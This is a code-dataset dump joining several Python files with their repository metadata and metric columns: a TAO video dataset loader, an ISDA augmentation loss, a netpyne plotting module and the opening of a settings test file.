return_points (bool): Determines whether to return SuperPoint Features. Default: False
return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
"""
def __init__(
self,
basedir: str,
videos: Union[tuple, str, None],
seqlen: int = 4,
dilation: Optional[int] = None,
stride: Optional[int] = None,
start: Optional[int] = None,
end: Optional[int] = None,
height: int = 480,
width: int = 640,
*,
return_img: bool = True,
return_seg: bool = True,
return_points: bool = False,
return_videonames: bool = False,
):
super(TAO, self).__init__()
self.basedir = os.path.normpath(basedir)
if not os.path.isdir(self.basedir):
raise ValueError("Base Directory: {} doesn't exist".format(basedir))
self.height = height
self.width = width
self.return_img = return_img
self.return_seg = return_seg
self.return_points = return_points
self.return_videonames = return_videonames
if not isinstance(seqlen, int):
raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
if not (isinstance(stride, int) or stride is None):
raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
if not (isinstance(dilation, int) or dilation is None):
raise TypeError(
"dilation must be int or None. Got {0}.".format(type(dilation))
)
dilation = dilation if dilation is not None else 0
stride = stride if stride is not None else seqlen * (dilation + 1)
self.seqlen = seqlen
self.stride = stride
self.dilation = dilation
if seqlen < 0:
raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
if dilation < 0:
raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
if stride < 0:
raise ValueError("stride must be positive. Got {0}.".format(stride))
if not (isinstance(start, int) or start is None):
raise TypeError("start must be int or None. Got {0}.".format(type(start)))
if not (isinstance(end, int) or end is None):
raise TypeError("end must be int or None. Got {0}.".format(type(end)))
start = start if start is not None else 0
self.start = start
self.end = end
if start < 0:
raise ValueError("start must be positive. Got {0}.".format(stride))
if not (end is None or end > start):
raise ValueError(
"end ({0}) must be None or greater than start ({1})".format(end, start)
)
# videos should be a tuple
if isinstance(videos, str):
if os.path.isfile(videos):
with open(videos, "r") as f:
videos = tuple(f.read().split("\n"))
else:
raise ValueError("incorrect filename: {} doesn't exist".format(videos))
elif not (isinstance(videos, tuple)):
msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
raise TypeError(msg % type(videos))
self.RGB_data = []
self.Seg_data = []
self.Points_data = []
self.Videonames_data = []
idx = np.arange(self.seqlen) * (self.dilation + 1)
rgbdir = os.path.join(self.basedir, 'JPEGImages/')
pointsdir = os.path.join(self.basedir, 'points/')
segdir = os.path.join(self.basedir, 'Annotations/')
for video in videos:
file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]
rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
if self.return_points:
points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
if self.return_seg:
seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]
video_len = len(rgb_list)
for start_index in range(self.start, video_len, self.stride):
if start_index + idx[-1] >= video_len:
break
inds = start_index + idx
self.RGB_data.append([rgb_list[ind] for ind in inds])
if self.return_seg:
self.Seg_data.append([seg_list[ind] for ind in inds])
if self.return_points:
self.Points_data.append([points_list[ind] for ind in inds])
if self.return_videonames:
self.Videonames_data.append(video)
self.num_sequences = len(self.RGB_data)
def __len__(self):
r"""Returns the length of the dataset. """
return self.num_sequences
def __getitem__(self, idx: int):
r"""Returns the data from the sequence at index idx.
Returns:
color_seq (torch.Tensor): Sequence of grayscale rgb images of each frame
seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames
points_seq (torch.Tensor): Sequence of SuperPoint Features
videoname (str): Videoname of Sequence
Shape:
- color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
- seg_seq: : "math: List of per frame instance segmentations with length `L`
- points_seq: "math: List of SuperPoint Features with length `L`
"""
# Read in the color info.
if self.return_img:
color_seq_path = self.RGB_data[idx]
if self.return_seg:
seg_seq_path = self.Seg_data[idx]
if self.return_points:
points_seq_path = self.Points_data[idx]
color_seq, seg_seq, points_seq = [], [], []
for i in range(self.seqlen):
if self.return_img:
image = cv2.imread(color_seq_path[i])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = torch.from_numpy(image).type(torch.float16)
image = image.permute(2,0,1)
image /= 255
color_seq.append(image)
if self.return_seg:
instance_img = np.array(Image.open(seg_seq_path[i]))
obj_ids = np.unique(instance_img)
obj_ids = obj_ids[~np.isin(obj_ids, [0])]
frame_ann = []
for obj_id in obj_ids:
ann = {}
ann['obj_id'] = obj_id
ann_mask = np.isin(instance_img, obj_id).astype(int)
ann['ann_mask'] = ann_mask
frame_ann.append(ann)
seg_seq.append(frame_ann)
if self.return_points:
with open(points_seq_path[i],'rb') as fp:
points = pickle.load(fp)
points_seq.append(points)
output = []
if self.return_img:
color_seq = torch.stack(color_seq, 0).float()
output.append(color_seq)
if self.return_seg:
output.append(seg_seq)
if self.return_points:
output.append(points_seq)
if self.return_videonames:
output.append(self.Videonames_data[idx])
return tuple(output)
| 41.788618
| 135
| 0.569163
| 1,280
| 10,280
| 4.541406
| 0.204688
| 0.032685
| 0.030965
| 0.012042
| 0.190263
| 0.112678
| 0.096508
| 0.084122
| 0.060382
| 0
| 0
| 0.010438
| 0.328988
| 10,280
| 246
| 136
| 41.788618
| 0.817918
| 0.307685
| 0
| 0.095541
| 0
| 0.006369
| 0.084711
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019108
| false
| 0
| 0.063694
| 0
| 0.101911
| 0.006369
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c59684045a1dab8436432732a93183e33f7d39d
| 3,853
|
py
|
Python
|
augmentation/ISDA.py
|
RichardScottOZ/sota-data-augmentation-and-optimizers
|
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
|
[
"MIT"
] | 31
|
2020-01-14T20:03:31.000Z
|
2022-01-07T08:02:09.000Z
|
augmentation/ISDA.py
|
RichardScottOZ/sota-data-augmentation-and-optimizers
|
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
|
[
"MIT"
] | null | null | null |
augmentation/ISDA.py
|
RichardScottOZ/sota-data-augmentation-and-optimizers
|
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
|
[
"MIT"
] | 6
|
2020-03-04T09:31:45.000Z
|
2021-11-21T18:47:15.000Z
|
import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
| 29.868217
| 104
| 0.536465
| 528
| 3,853
| 3.683712
| 0.145833
| 0.013368
| 0.024679
| 0.023136
| 0.294602
| 0.255013
| 0.172751
| 0.137789
| 0.086375
| 0.086375
| 0
| 0.021028
| 0.333506
| 3,853
| 128
| 105
| 30.101563
| 0.736371
| 0.058137
| 0
| 0.120482
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060241
| false
| 0
| 0.024096
| 0
| 0.13253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c59cbad1a1c628d8be0abf3472039d2b0fe36c6
| 22,828
|
py
|
Python
|
netpyne/plotting/plotter.py
|
sanjayankur31/netpyne
|
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
|
[
"MIT"
] | null | null | null |
netpyne/plotting/plotter.py
|
sanjayankur31/netpyne
|
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
|
[
"MIT"
] | null | null | null |
netpyne/plotting/plotter.py
|
sanjayankur31/netpyne
|
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
|
[
"MIT"
] | null | null | null |
"""
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
Draw a horizontal and/or vertical bar with the size in data coordinate
of the give axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
def autosize(value, maxvalue, scale, n=1, m=10):
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
| 34.535552
| 376
| 0.56987
| 2,724
| 22,828
| 4.728708
| 0.168502
| 0.032063
| 0.010092
| 0.014906
| 0.231892
| 0.180731
| 0.134462
| 0.11482
| 0.110318
| 0.110318
| 0
| 0.013848
| 0.307254
| 22,828
| 660
| 377
| 34.587879
| 0.800683
| 0.114027
| 0
| 0.22488
| 0
| 0
| 0.063341
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064593
| false
| 0
| 0.033493
| 0
| 0.138756
| 0.002392
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5b215bf00e243da89ca4e94c55e9e94a7ff44a
| 9,885
|
py
|
Python
|
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
def test_simple_settings() -> None:
settings = Settings(
settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json",
